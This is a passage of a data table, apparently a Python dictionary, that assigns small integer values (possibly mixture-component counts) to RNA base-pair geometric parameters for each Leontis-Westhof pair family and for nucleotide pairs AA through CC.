"tHH_AA_tips_distance":2, "tHH_AA_C1'-B1-B1pair":2, "tHH_AA_B1-B1pair-C1'pair":2, "tHH_AA_C4'-C1'-B1-B1pair":3, "tHH_AA_B1-B1pair-C1'pair-C4'pair":1, "tHH_AA_alpha_1":2, "tHH_AA_alpha_2":2, "tHH_AA_dB1":2, "tHH_AA_dB2":2,
"cSH_AA_tips_distance":2, "cSH_AA_C1'-B1-B1pair":2, "cSH_AA_B1-B1pair-C1'pair":1, "cSH_AA_C4'-C1'-B1-B1pair":3, "cSH_AA_B1-B1pair-C1'pair-C4'pair":2, "cSH_AA_alpha_1":2, "cSH_AA_alpha_2":2, "cSH_AA_dB1":4, "cSH_AA_dB2":1,
"tSH_AA_tips_distance":2, "tSH_AA_C1'-B1-B1pair":1, "tSH_AA_B1-B1pair-C1'pair":2, "tSH_AA_C4'-C1'-B1-B1pair":2, "tSH_AA_B1-B1pair-C1'pair-C4'pair":2, "tSH_AA_alpha_1":2, "tSH_AA_alpha_2":3, "tSH_AA_dB1":2, "tSH_AA_dB2":2,
"cHS_AA_tips_distance":3, "cHS_AA_C1'-B1-B1pair":2, "cHS_AA_B1-B1pair-C1'pair":2, "cHS_AA_C4'-C1'-B1-B1pair":2, "cHS_AA_B1-B1pair-C1'pair-C4'pair":1, "cHS_AA_alpha_1":2, "cHS_AA_alpha_2":2, "cHS_AA_dB1":1, "cHS_AA_dB2":4,
"tHS_AA_tips_distance":4, "tHS_AA_C1'-B1-B1pair":2, "tHS_AA_B1-B1pair-C1'pair":2, "tHS_AA_C4'-C1'-B1-B1pair":2, "tHS_AA_B1-B1pair-C1'pair-C4'pair":1, "tHS_AA_alpha_1":2, "tHS_AA_alpha_2":1, "tHS_AA_dB1":2, "tHS_AA_dB2":1,
"cSS_AA_tips_distance":6, "cSS_AA_C1'-B1-B1pair":3, "cSS_AA_B1-B1pair-C1'pair":3, "cSS_AA_C4'-C1'-B1-B1pair":2, "cSS_AA_B1-B1pair-C1'pair-C4'pair":2, "cSS_AA_alpha_1":3, "cSS_AA_alpha_2":3, "cSS_AA_dB1":3, "cSS_AA_dB2":5,
"tSS_AA_tips_distance":5, "tSS_AA_C1'-B1-B1pair":1, "tSS_AA_B1-B1pair-C1'pair":1, "tSS_AA_C4'-C1'-B1-B1pair":2, "tSS_AA_B1-B1pair-C1'pair-C4'pair":1, "tSS_AA_alpha_1":3, "tSS_AA_alpha_2":1, "tSS_AA_dB1":4, "tSS_AA_dB2":2,
"cWW_AC_tips_distance":2, "cWW_AC_C1'-B1-B1pair":1, "cWW_AC_B1-B1pair-C1'pair":2, "cWW_AC_C4'-C1'-B1-B1pair":2, "cWW_AC_B1-B1pair-C1'pair-C4'pair":2, "cWW_AC_alpha_1":1, "cWW_AC_alpha_2":2, "cWW_AC_dB1":3, "cWW_AC_dB2":3,
"tWW_AC_tips_distance":2, "tWW_AC_C1'-B1-B1pair":3, "tWW_AC_B1-B1pair-C1'pair":2, "tWW_AC_C4'-C1'-B1-B1pair":3, "tWW_AC_B1-B1pair-C1'pair-C4'pair":3, "tWW_AC_alpha_1":3, "tWW_AC_alpha_2":2, "tWW_AC_dB1":4, "tWW_AC_dB2":3,
"cWH_AC_tips_distance":5, "cWH_AC_C1'-B1-B1pair":2, "cWH_AC_B1-B1pair-C1'pair":2, "cWH_AC_C4'-C1'-B1-B1pair":1, "cWH_AC_B1-B1pair-C1'pair-C4'pair":2, "cWH_AC_alpha_1":2, "cWH_AC_alpha_2":2, "cWH_AC_dB1":4, "cWH_AC_dB2":4,
"tWH_AC_tips_distance":8, "tWH_AC_C1'-B1-B1pair":1, "tWH_AC_B1-B1pair-C1'pair":2, "tWH_AC_C4'-C1'-B1-B1pair":2, "tWH_AC_B1-B1pair-C1'pair-C4'pair":3, "tWH_AC_alpha_1":2, "tWH_AC_alpha_2":2, "tWH_AC_dB1":3, "tWH_AC_dB2":3,
"cHW_AC_tips_distance":2, "cHW_AC_C1'-B1-B1pair":2, "cHW_AC_B1-B1pair-C1'pair":2, "cHW_AC_C4'-C1'-B1-B1pair":3, "cHW_AC_B1-B1pair-C1'pair-C4'pair":2, "cHW_AC_alpha_1":2, "cHW_AC_alpha_2":3, "cHW_AC_dB1":2, "cHW_AC_dB2":5,
"tHW_AC_tips_distance":3, "tHW_AC_C1'-B1-B1pair":2, "tHW_AC_B1-B1pair-C1'pair":3, "tHW_AC_C4'-C1'-B1-B1pair":3, "tHW_AC_B1-B1pair-C1'pair-C4'pair":2, "tHW_AC_alpha_1":2, "tHW_AC_alpha_2":2, "tHW_AC_dB1":3, "tHW_AC_dB2":3,
"cWS_AC_tips_distance":3, "cWS_AC_C1'-B1-B1pair":2, "cWS_AC_B1-B1pair-C1'pair":1, "cWS_AC_C4'-C1'-B1-B1pair":2, "cWS_AC_B1-B1pair-C1'pair-C4'pair":1, "cWS_AC_alpha_1":2, "cWS_AC_alpha_2":1, "cWS_AC_dB1":1, "cWS_AC_dB2":1,
"tWS_AC_tips_distance":4, "tWS_AC_C1'-B1-B1pair":2, "tWS_AC_B1-B1pair-C1'pair":1, "tWS_AC_C4'-C1'-B1-B1pair":2, "tWS_AC_B1-B1pair-C1'pair-C4'pair":2, "tWS_AC_alpha_1":3, "tWS_AC_alpha_2":1, "tWS_AC_dB1":3, "tWS_AC_dB2":2,
"cSW_AC_tips_distance":6, "cSW_AC_C1'-B1-B1pair":2, "cSW_AC_B1-B1pair-C1'pair":2, "cSW_AC_C4'-C1'-B1-B1pair":2, "cSW_AC_B1-B1pair-C1'pair-C4'pair":2, "cSW_AC_alpha_1":3, "cSW_AC_alpha_2":2, "cSW_AC_dB1":2, "cSW_AC_dB2":3,
"tSW_AC_tips_distance":5, "tSW_AC_C1'-B1-B1pair":1, "tSW_AC_B1-B1pair-C1'pair":2, "tSW_AC_C4'-C1'-B1-B1pair":1, "tSW_AC_B1-B1pair-C1'pair-C4'pair":2, "tSW_AC_alpha_1":1, "tSW_AC_alpha_2":2, "tSW_AC_dB1":2, "tSW_AC_dB2":3,
"cHH_AC_tips_distance":5, "cHH_AC_C1'-B1-B1pair":2, "cHH_AC_B1-B1pair-C1'pair":2, "cHH_AC_C4'-C1'-B1-B1pair":2, "cHH_AC_B1-B1pair-C1'pair-C4'pair":1, "cHH_AC_alpha_1":3, "cHH_AC_alpha_2":3, "cHH_AC_dB1":3, "cHH_AC_dB2":4,
"tHH_AC_tips_distance":4, "tHH_AC_C1'-B1-B1pair":1, "tHH_AC_B1-B1pair-C1'pair":2, "tHH_AC_C4'-C1'-B1-B1pair":2, "tHH_AC_B1-B1pair-C1'pair-C4'pair":3, "tHH_AC_alpha_1":2, "tHH_AC_alpha_2":2, "tHH_AC_dB1":4, "tHH_AC_dB2":3,
"cSH_AC_tips_distance":3, "cSH_AC_C1'-B1-B1pair":1, "cSH_AC_B1-B1pair-C1'pair":3, "cSH_AC_C4'-C1'-B1-B1pair":1, "cSH_AC_B1-B1pair-C1'pair-C4'pair":2, "cSH_AC_alpha_1":1, "cSH_AC_alpha_2":1, "cSH_AC_dB1":2, "cSH_AC_dB2":6,
"tSH_AC_tips_distance":8, "tSH_AC_C1'-B1-B1pair":3, "tSH_AC_B1-B1pair-C1'pair":2, "tSH_AC_C4'-C1'-B1-B1pair":1, "tSH_AC_B1-B1pair-C1'pair-C4'pair":2, "tSH_AC_alpha_1":2, "tSH_AC_alpha_2":3, "tSH_AC_dB1":1, "tSH_AC_dB2":2,
"cHS_AC_tips_distance":4, "cHS_AC_C1'-B1-B1pair":1, "cHS_AC_B1-B1pair-C1'pair":1, "cHS_AC_C4'-C1'-B1-B1pair":2, "cHS_AC_B1-B1pair-C1'pair-C4'pair":1, "cHS_AC_alpha_1":1, "cHS_AC_alpha_2":1, "cHS_AC_dB1":3, "cHS_AC_dB2":2,
"tHS_AC_tips_distance":8, "tHS_AC_C1'-B1-B1pair":1, "tHS_AC_B1-B1pair-C1'pair":2, "tHS_AC_C4'-C1'-B1-B1pair":2, "tHS_AC_B1-B1pair-C1'pair-C4'pair":2, "tHS_AC_alpha_1":1, "tHS_AC_alpha_2":1, "tHS_AC_dB1":1, "tHS_AC_dB2":1,
"cSS_AC_tips_distance":2, "cSS_AC_C1'-B1-B1pair":2, "cSS_AC_B1-B1pair-C1'pair":2, "cSS_AC_C4'-C1'-B1-B1pair":1, "cSS_AC_B1-B1pair-C1'pair-C4'pair":1, "cSS_AC_alpha_1":2, "cSS_AC_alpha_2":1, "cSS_AC_dB1":1, "cSS_AC_dB2":5,
"tSS_AC_tips_distance":5, "tSS_AC_C1'-B1-B1pair":2, "tSS_AC_B1-B1pair-C1'pair":2, "tSS_AC_C4'-C1'-B1-B1pair":1, "tSS_AC_B1-B1pair-C1'pair-C4'pair":2, "tSS_AC_alpha_1":2, "tSS_AC_alpha_2":2, "tSS_AC_dB1":3, "tSS_AC_dB2":5,
"cWW_AG_tips_distance":3, "cWW_AG_C1'-B1-B1pair":1, "cWW_AG_B1-B1pair-C1'pair":1, "cWW_AG_C4'-C1'-B1-B1pair":2, "cWW_AG_B1-B1pair-C1'pair-C4'pair":2, "cWW_AG_alpha_1":1, "cWW_AG_alpha_2":1, "cWW_AG_dB1":1, "cWW_AG_dB2":1,
"tWW_AG_tips_distance":5, "tWW_AG_C1'-B1-B1pair":1, "tWW_AG_B1-B1pair-C1'pair":1, "tWW_AG_C4'-C1'-B1-B1pair":2, "tWW_AG_B1-B1pair-C1'pair-C4'pair":2, "tWW_AG_alpha_1":2, "tWW_AG_alpha_2":2, "tWW_AG_dB1":2, "tWW_AG_dB2":3,
"cWH_AG_tips_distance":4, "cWH_AG_C1'-B1-B1pair":1, "cWH_AG_B1-B1pair-C1'pair":1, "cWH_AG_C4'-C1'-B1-B1pair":2, "cWH_AG_B1-B1pair-C1'pair-C4'pair":2, "cWH_AG_alpha_1":3, "cWH_AG_alpha_2":1, "cWH_AG_dB1":2, "cWH_AG_dB2":1,
"tWH_AG_tips_distance":3, "tWH_AG_C1'-B1-B1pair":1, "tWH_AG_B1-B1pair-C1'pair":1, "tWH_AG_C4'-C1'-B1-B1pair":2, "tWH_AG_B1-B1pair-C1'pair-C4'pair":2, "tWH_AG_alpha_1":2, "tWH_AG_alpha_2":1, "tWH_AG_dB1":2, "tWH_AG_dB2":1,
"cHW_AG_tips_distance":2, "cHW_AG_C1'-B1-B1pair":2, "cHW_AG_B1-B1pair-C1'pair":1, "cHW_AG_C4'-C1'-B1-B1pair":2, "cHW_AG_B1-B1pair-C1'pair-C4'pair":1, "cHW_AG_alpha_1":1, "cHW_AG_alpha_2":2, "cHW_AG_dB1":2, "cHW_AG_dB2":2,
"tHW_AG_tips_distance":3, "tHW_AG_C1'-B1-B1pair":2, "tHW_AG_B1-B1pair-C1'pair":2, "tHW_AG_C4'-C1'-B1-B1pair":2, "tHW_AG_B1-B1pair-C1'pair-C4'pair":2, "tHW_AG_alpha_1":2, "tHW_AG_alpha_2":2, "tHW_AG_dB1":2, "tHW_AG_dB2":2,
"cWS_AG_tips_distance":1, "cWS_AG_C1'-B1-B1pair":3, "cWS_AG_B1-B1pair-C1'pair":1, "cWS_AG_C4'-C1'-B1-B1pair":1, "cWS_AG_B1-B1pair-C1'pair-C4'pair":1, "cWS_AG_alpha_1":2, "cWS_AG_alpha_2":2, "cWS_AG_dB1":2, "cWS_AG_dB2":1,
"tWS_AG_tips_distance":6, "tWS_AG_C1'-B1-B1pair":1, "tWS_AG_B1-B1pair-C1'pair":2, "tWS_AG_C4'-C1'-B1-B1pair":2, "tWS_AG_B1-B1pair-C1'pair-C4'pair":1, "tWS_AG_alpha_1":2, "tWS_AG_alpha_2":2, "tWS_AG_dB1":1, "tWS_AG_dB2":3,
"cSW_AG_tips_distance":4, "cSW_AG_C1'-B1-B1pair":1, "cSW_AG_B1-B1pair-C1'pair":2, "cSW_AG_C4'-C1'-B1-B1pair":1, "cSW_AG_B1-B1pair-C1'pair-C4'pair":2, "cSW_AG_alpha_1":1, "cSW_AG_alpha_2":2, "cSW_AG_dB1":3, "cSW_AG_dB2":1,
"tSW_AG_tips_distance":7, "tSW_AG_C1'-B1-B1pair":3, "tSW_AG_B1-B1pair-C1'pair":2, "tSW_AG_C4'-C1'-B1-B1pair":2, "tSW_AG_B1-B1pair-C1'pair-C4'pair":2, "tSW_AG_alpha_1":2, "tSW_AG_alpha_2":2, "tSW_AG_dB1":3, "tSW_AG_dB2":3,
"cHH_AG_tips_distance":2, "cHH_AG_C1'-B1-B1pair":2, "cHH_AG_B1-B1pair-C1'pair":4, "cHH_AG_C4'-C1'-B1-B1pair":3, "cHH_AG_B1-B1pair-C1'pair-C4'pair":2, "cHH_AG_alpha_1":2, "cHH_AG_alpha_2":3, "cHH_AG_dB1":1, "cHH_AG_dB2":2,
"tHH_AG_tips_distance":8, "tHH_AG_C1'-B1-B1pair":3, "tHH_AG_B1-B1pair-C1'pair":3, "tHH_AG_C4'-C1'-B1-B1pair":3, "tHH_AG_B1-B1pair-C1'pair-C4'pair":2, "tHH_AG_alpha_1":3, "tHH_AG_alpha_2":3, "tHH_AG_dB1":1, "tHH_AG_dB2":2,
"cSH_AG_tips_distance":5, "cSH_AG_C1'-B1-B1pair":2, "cSH_AG_B1-B1pair-C1'pair":2, "cSH_AG_C4'-C1'-B1-B1pair":2, "cSH_AG_B1-B1pair-C1'pair-C4'pair":2, "cSH_AG_alpha_1":3, "cSH_AG_alpha_2":1, "cSH_AG_dB1":1, "cSH_AG_dB2":3,
"tSH_AG_tips_distance":5, "tSH_AG_C1'-B1-B1pair":2, "tSH_AG_B1-B1pair-C1'pair":2, "tSH_AG_C4'-C1'-B1-B1pair":2, "tSH_AG_B1-B1pair-C1'pair-C4'pair":3, "tSH_AG_alpha_1":2, "tSH_AG_alpha_2":4, "tSH_AG_dB1":3, "tSH_AG_dB2":2,
"cHS_AG_tips_distance":1, "cHS_AG_C1'-B1-B1pair":3, "cHS_AG_B1-B1pair-C1'pair":1, "cHS_AG_C4'-C1'-B1-B1pair":3, "cHS_AG_B1-B1pair-C1'pair-C4'pair":1, "cHS_AG_alpha_1":2, "cHS_AG_alpha_2":3, "cHS_AG_dB1":1, "cHS_AG_dB2":2,
"tHS_AG_tips_distance":6, "tHS_AG_C1'-B1-B1pair":1, "tHS_AG_B1-B1pair-C1'pair":2, "tHS_AG_C4'-C1'-B1-B1pair":2, "tHS_AG_B1-B1pair-C1'pair-C4'pair":2, "tHS_AG_alpha_1":1, "tHS_AG_alpha_2":2, "tHS_AG_dB1":2, "tHS_AG_dB2":1,
"cSS_AG_tips_distance":2, "cSS_AG_C1'-B1-B1pair":2, "cSS_AG_B1-B1pair-C1'pair":2, "cSS_AG_C4'-C1'-B1-B1pair":2, "cSS_AG_B1-B1pair-C1'pair-C4'pair":1, "cSS_AG_alpha_1":2, "cSS_AG_alpha_2":1, "cSS_AG_dB1":2, "cSS_AG_dB2":4,
"tSS_AG_tips_distance":4, "tSS_AG_C1'-B1-B1pair":3, "tSS_AG_B1-B1pair-C1'pair":1, "tSS_AG_C4'-C1'-B1-B1pair":2, "tSS_AG_B1-B1pair-C1'pair-C4'pair":1, "tSS_AG_alpha_1":2, "tSS_AG_alpha_2":1, "tSS_AG_dB1":2, "tSS_AG_dB2":4,
"cWW_AU_tips_distance":3, "cWW_AU_C1'-B1-B1pair":1, "cWW_AU_B1-B1pair-C1'pair":2, "cWW_AU_C4'-C1'-B1-B1pair":3, "cWW_AU_B1-B1pair-C1'pair-C4'pair":2, "cWW_AU_alpha_1":3, "cWW_AU_alpha_2":1, "cWW_AU_dB1":4, "cWW_AU_dB2":2,
"tWW_AU_tips_distance":3, "tWW_AU_C1'-B1-B1pair":3, "tWW_AU_B1-B1pair-C1'pair":3, "tWW_AU_C4'-C1'-B1-B1pair":2, "tWW_AU_B1-B1pair-C1'pair-C4'pair":2, "tWW_AU_alpha_1":3, "tWW_AU_alpha_2":2, "tWW_AU_dB1":3, "tWW_AU_dB2":2,
"cWH_AU_tips_distance":5, "cWH_AU_C1'-B1-B1pair":2, "cWH_AU_B1-B1pair-C1'pair":2, "cWH_AU_C4'-C1'-B1-B1pair":2, "cWH_AU_B1-B1pair-C1'pair-C4'pair":2, "cWH_AU_alpha_1":1, "cWH_AU_alpha_2":3, "cWH_AU_dB1":3, "cWH_AU_dB2":3,
"tWH_AU_tips_distance":6, "tWH_AU_C1'-B1-B1pair":1, "tWH_AU_B1-B1pair-C1'pair":3, "tWH_AU_C4'-C1'-B1-B1pair":2, "tWH_AU_B1-B1pair-C1'pair-C4'pair":2, "tWH_AU_alpha_1":2, "tWH_AU_alpha_2":2, "tWH_AU_dB1":1, "tWH_AU_dB2":3,
"cHW_AU_tips_distance":3, "cHW_AU_C1'-B1-B1pair":3, "cHW_AU_B1-B1pair-C1'pair":3, "cHW_AU_C4'-C1'-B1-B1pair":2, "cHW_AU_B1-B1pair-C1'pair-C4'pair":2, "cHW_AU_alpha_1":1, "cHW_AU_alpha_2":2, "cHW_AU_dB1":2, "cHW_AU_dB2":2,
"tHW_AU_tips_distance":3, "tHW_AU_C1'-B1-B1pair":2, "tHW_AU_B1-B1pair-C1'pair":2, "tHW_AU_C4'-C1'-B1-B1pair":2, "tHW_AU_B1-B1pair-C1'pair-C4'pair":2, "tHW_AU_alpha_1":2, "tHW_AU_alpha_2":1, "tHW_AU_dB1":1, "tHW_AU_dB2":4,
"cWS_AU_tips_distance":2, "cWS_AU_C1'-B1-B1pair":1, "cWS_AU_B1-B1pair-C1'pair":1, "cWS_AU_C4'-C1'-B1-B1pair":2, "cWS_AU_B1-B1pair-C1'pair-C4'pair":1, "cWS_AU_alpha_1":2, "cWS_AU_alpha_2":2, "cWS_AU_dB1":2, "cWS_AU_dB2":5,
"tWS_AU_tips_distance":2, "tWS_AU_C1'-B1-B1pair":2, "tWS_AU_B1-B1pair-C1'pair":2, "tWS_AU_C4'-C1'-B1-B1pair":2, "tWS_AU_B1-B1pair-C1'pair-C4'pair":1, "tWS_AU_alpha_1":2, "tWS_AU_alpha_2":2, "tWS_AU_dB1":3, "tWS_AU_dB2":4,
"cSW_AU_tips_distance":2, "cSW_AU_C1'-B1-B1pair":3, "cSW_AU_B1-B1pair-C1'pair":2, "cSW_AU_C4'-C1'-B1-B1pair":2, "cSW_AU_B1-B1pair-C1'pair-C4'pair":2, "cSW_AU_alpha_1":3, "cSW_AU_alpha_2":2, "cSW_AU_dB1":2, "cSW_AU_dB2":3,
"tSW_AU_tips_distance":3, "tSW_AU_C1'-B1-B1pair":2, "tSW_AU_B1-B1pair-C1'pair":3, "tSW_AU_C4'-C1'-B1-B1pair":3, "tSW_AU_B1-B1pair-C1'pair-C4'pair":2, "tSW_AU_alpha_1":2, "tSW_AU_alpha_2":1, "tSW_AU_dB1":3, "tSW_AU_dB2":4,
"cHH_AU_tips_distance":6, "cHH_AU_C1'-B1-B1pair":2, "cHH_AU_B1-B1pair-C1'pair":1, "cHH_AU_C4'-C1'-B1-B1pair":2, "cHH_AU_B1-B1pair-C1'pair-C4'pair":1, "cHH_AU_alpha_1":2, "cHH_AU_alpha_2":2, "cHH_AU_dB1":1, "cHH_AU_dB2":2,
"tHH_AU_tips_distance":8, "tHH_AU_C1'-B1-B1pair":3, "tHH_AU_B1-B1pair-C1'pair":3, "tHH_AU_C4'-C1'-B1-B1pair":3, "tHH_AU_B1-B1pair-C1'pair-C4'pair":2, "tHH_AU_alpha_1":3, "tHH_AU_alpha_2":3, "tHH_AU_dB1":1, "tHH_AU_dB2":3,
"cSH_AU_tips_distance":5, "cSH_AU_C1'-B1-B1pair":1, "cSH_AU_B1-B1pair-C1'pair":3, "cSH_AU_C4'-C1'-B1-B1pair":3, "cSH_AU_B1-B1pair-C1'pair-C4'pair":2, "cSH_AU_alpha_1":2, "cSH_AU_alpha_2":1, "cSH_AU_dB1":4, "cSH_AU_dB2":4,
"tSH_AU_tips_distance":5, "tSH_AU_C1'-B1-B1pair":3, "tSH_AU_B1-B1pair-C1'pair":1, "tSH_AU_C4'-C1'-B1-B1pair":1, "tSH_AU_B1-B1pair-C1'pair-C4'pair":2, "tSH_AU_alpha_1":3, "tSH_AU_alpha_2":3, "tSH_AU_dB1":3, "tSH_AU_dB2":4,
"cHS_AU_tips_distance":2, "cHS_AU_C1'-B1-B1pair":3, "cHS_AU_B1-B1pair-C1'pair":1, "cHS_AU_C4'-C1'-B1-B1pair":2, "cHS_AU_B1-B1pair-C1'pair-C4'pair":2, "cHS_AU_alpha_1":2, "cHS_AU_alpha_2":2, "cHS_AU_dB1":1, "cHS_AU_dB2":3,
"tHS_AU_tips_distance":2, "tHS_AU_C1'-B1-B1pair":2, "tHS_AU_B1-B1pair-C1'pair":2, "tHS_AU_C4'-C1'-B1-B1pair":2, "tHS_AU_B1-B1pair-C1'pair-C4'pair":3, "tHS_AU_alpha_1":3, "tHS_AU_alpha_2":2, "tHS_AU_dB1":3, "tHS_AU_dB2":3,
"cSS_AU_tips_distance":3, "cSS_AU_C1'-B1-B1pair":2, "cSS_AU_B1-B1pair-C1'pair":2, "cSS_AU_C4'-C1'-B1-B1pair":1, "cSS_AU_B1-B1pair-C1'pair-C4'pair":2, "cSS_AU_alpha_1":3, "cSS_AU_alpha_2":2, "cSS_AU_dB1":1, "cSS_AU_dB2":4,
"tSS_AU_tips_distance":5, "tSS_AU_C1'-B1-B1pair":2, "tSS_AU_B1-B1pair-C1'pair":1, "tSS_AU_C4'-C1'-B1-B1pair":3, "tSS_AU_B1-B1pair-C1'pair-C4'pair":2, "tSS_AU_alpha_1":2, "tSS_AU_alpha_2":3, "tSS_AU_dB1":3, "tSS_AU_dB2":8,
"cWW_CA_tips_distance":2, "cWW_CA_C1'-B1-B1pair":2, "cWW_CA_B1-B1pair-C1'pair":1, "cWW_CA_C4'-C1'-B1-B1pair":2, "cWW_CA_B1-B1pair-C1'pair-C4'pair":2, "cWW_CA_alpha_1":1, "cWW_CA_alpha_2":2, "cWW_CA_dB1":1, "cWW_CA_dB2":1,
"tWW_CA_tips_distance":4, "tWW_CA_C1'-B1-B1pair":2, "tWW_CA_B1-B1pair-C1'pair":2, "tWW_CA_C4'-C1'-B1-B1pair":3, "tWW_CA_B1-B1pair-C1'pair-C4'pair":2, "tWW_CA_alpha_1":2, "tWW_CA_alpha_2":1, "tWW_CA_dB1":4, "tWW_CA_dB2":2,
"cWH_CA_tips_distance":3, "cWH_CA_C1'-B1-B1pair":3, "cWH_CA_B1-B1pair-C1'pair":2, "cWH_CA_C4'-C1'-B1-B1pair":2, "cWH_CA_B1-B1pair-C1'pair-C4'pair":3, "cWH_CA_alpha_1":3, "cWH_CA_alpha_2":2, "cWH_CA_dB1":5, "cWH_CA_dB2":2,
"tWH_CA_tips_distance":5, "tWH_CA_C1'-B1-B1pair":1, "tWH_CA_B1-B1pair-C1'pair":1, "tWH_CA_C4'-C1'-B1-B1pair":2, "tWH_CA_B1-B1pair-C1'pair-C4'pair":2, "tWH_CA_alpha_1":3, "tWH_CA_alpha_2":1, "tWH_CA_dB1":3, "tWH_CA_dB2":2,
"cHW_CA_tips_distance":2, "cHW_CA_C1'-B1-B1pair":2, "cHW_CA_B1-B1pair-C1'pair":2, "cHW_CA_C4'-C1'-B1-B1pair":2, "cHW_CA_B1-B1pair-C1'pair-C4'pair":2, "cHW_CA_alpha_1":2, "cHW_CA_alpha_2":2, "cHW_CA_dB1":4, "cHW_CA_dB2":2,
"tHW_CA_tips_distance":2, "tHW_CA_C1'-B1-B1pair":2, "tHW_CA_B1-B1pair-C1'pair":2, "tHW_CA_C4'-C1'-B1-B1pair":2, "tHW_CA_B1-B1pair-C1'pair-C4'pair":2, "tHW_CA_alpha_1":2, "tHW_CA_alpha_2":2, "tHW_CA_dB1":6, "tHW_CA_dB2":2,
"cWS_CA_tips_distance":2, "cWS_CA_C1'-B1-B1pair":2, "cWS_CA_B1-B1pair-C1'pair":2, "cWS_CA_C4'-C1'-B1-B1pair":2, "cWS_CA_B1-B1pair-C1'pair-C4'pair":1, "cWS_CA_alpha_1":2, "cWS_CA_alpha_2":2, "cWS_CA_dB1":4, "cWS_CA_dB2":2,
"tWS_CA_tips_distance":5, "tWS_CA_C1'-B1-B1pair":3, "tWS_CA_B1-B1pair-C1'pair":1, "tWS_CA_C4'-C1'-B1-B1pair":3, "tWS_CA_B1-B1pair-C1'pair-C4'pair":2, "tWS_CA_alpha_1":3, "tWS_CA_alpha_2":1, "tWS_CA_dB1":1, "tWS_CA_dB2":1,
"cSW_CA_tips_distance":1, "cSW_CA_C1'-B1-B1pair":1, "cSW_CA_B1-B1pair-C1'pair":1, "cSW_CA_C4'-C1'-B1-B1pair":1, "cSW_CA_B1-B1pair-C1'pair-C4'pair":2, "cSW_CA_alpha_1":1, "cSW_CA_alpha_2":3, "cSW_CA_dB1":1, "cSW_CA_dB2":1,
"tSW_CA_tips_distance":3, "tSW_CA_C1'-B1-B1pair":2, "tSW_CA_B1-B1pair-C1'pair":2, "tSW_CA_C4'-C1'-B1-B1pair":1, "tSW_CA_B1-B1pair-C1'pair-C4'pair":1, "tSW_CA_alpha_1":2, "tSW_CA_alpha_2":3, "tSW_CA_dB1":3, "tSW_CA_dB2":1,
"cHH_CA_tips_distance":5, "cHH_CA_C1'-B1-B1pair":2, "cHH_CA_B1-B1pair-C1'pair":1, "cHH_CA_C4'-C1'-B1-B1pair":3, "cHH_CA_B1-B1pair-C1'pair-C4'pair":1, "cHH_CA_alpha_1":2, "cHH_CA_alpha_2":1, "cHH_CA_dB1":1, "cHH_CA_dB2":2,
"tHH_CA_tips_distance":1, "tHH_CA_C1'-B1-B1pair":2, "tHH_CA_B1-B1pair-C1'pair":2, "tHH_CA_C4'-C1'-B1-B1pair":3, "tHH_CA_B1-B1pair-C1'pair-C4'pair":3, "tHH_CA_alpha_1":2, "tHH_CA_alpha_2":1, "tHH_CA_dB1":3, "tHH_CA_dB2":5,
"cSH_CA_tips_distance":3, "cSH_CA_C1'-B1-B1pair":1, "cSH_CA_B1-B1pair-C1'pair":3, "cSH_CA_C4'-C1'-B1-B1pair":2, "cSH_CA_B1-B1pair-C1'pair-C4'pair":1, "cSH_CA_alpha_1":1, "cSH_CA_alpha_2":1, "cSH_CA_dB1":2, "cSH_CA_dB2":3,
"tSH_CA_tips_distance":2, "tSH_CA_C1'-B1-B1pair":1, "tSH_CA_B1-B1pair-C1'pair":2, "tSH_CA_C4'-C1'-B1-B1pair":2, "tSH_CA_B1-B1pair-C1'pair-C4'pair":2, "tSH_CA_alpha_1":3, "tSH_CA_alpha_2":2, "tSH_CA_dB1":6, "tSH_CA_dB2":4,
"cHS_CA_tips_distance":2, "cHS_CA_C1'-B1-B1pair":2, "cHS_CA_B1-B1pair-C1'pair":2, "cHS_CA_C4'-C1'-B1-B1pair":1, "cHS_CA_B1-B1pair-C1'pair-C4'pair":1, "cHS_CA_alpha_1":1, "cHS_CA_alpha_2":2, "cHS_CA_dB1":2, "cHS_CA_dB2":2,
"tHS_CA_tips_distance":3, "tHS_CA_C1'-B1-B1pair":2, "tHS_CA_B1-B1pair-C1'pair":1, "tHS_CA_C4'-C1'-B1-B1pair":2, "tHS_CA_B1-B1pair-C1'pair-C4'pair":2, "tHS_CA_alpha_1":3, "tHS_CA_alpha_2":3, "tHS_CA_dB1":2, "tHS_CA_dB2":1,
"cSS_CA_tips_distance":7, "cSS_CA_C1'-B1-B1pair":2, "cSS_CA_B1-B1pair-C1'pair":2, "cSS_CA_C4'-C1'-B1-B1pair":1, "cSS_CA_B1-B1pair-C1'pair-C4'pair":1, "cSS_CA_alpha_1":3, "cSS_CA_alpha_2":3, "cSS_CA_dB1":3, "cSS_CA_dB2":1,
"tSS_CA_tips_distance":5, "tSS_CA_C1'-B1-B1pair":2, "tSS_CA_B1-B1pair-C1'pair":2, "tSS_CA_C4'-C1'-B1-B1pair":2, "tSS_CA_B1-B1pair-C1'pair-C4'pair":1, "tSS_CA_alpha_1":2, "tSS_CA_alpha_2":2, "tSS_CA_dB1":4, "tSS_CA_dB2":2,
"cWW_CC_tips_distance":3, "cWW_CC_C1'-B1-B1pair":1, "cWW_CC_B1-B1pair-C1'pair":1, "cWW_CC_C4'-C1'-B1-B1pair":2, "cWW_CC_B1-B1pair-C1'pair-C4'pair":2, "cWW_CC_alpha_1":1, "cWW_CC_alpha_2":2, "cWW_CC_dB1":2, "cWW_CC_dB2":2,
"tWW_CC_tips_distance":6, "tWW_CC_C1'-B1-B1pair":3, "tWW_CC_B1-B1pair-C1'pair":3, "tWW_CC_C4'-C1'-B1-B1pair":3, "tWW_CC_B1-B1pair-C1'pair-C4'pair":3, "tWW_CC_alpha_1":2, "tWW_CC_alpha_2":2, "tWW_CC_dB1":6, "tWW_CC_dB2":3,
"cWH_CC_tips_distance":4, "cWH_CC_C1'-B1-B1pair":2, "cWH_CC_B1-B1pair-C1'pair":2, "cWH_CC_C4'-C1'-B1-B1pair":2, "cWH_CC_B1-B1pair-C1'pair-C4'pair":1, "cWH_CC_alpha_1":1, "cWH_CC_alpha_2":3, "cWH_CC_dB1":3, "cWH_CC_dB2":2,
"tWH_CC_tips_distance":1, "tWH_CC_C1'-B1-B1pair":1, "tWH_CC_B1-B1pair-C1'pair":3, "tWH_CC_C4'-C1'-B1-B1pair":2, "tWH_CC_B1-B1pair-C1'pair-C4'pair":1, "tWH_CC_alpha_1":3, "tWH_CC_alpha_2":1, "tWH_CC_dB1":3, "tWH_CC_dB2":3,
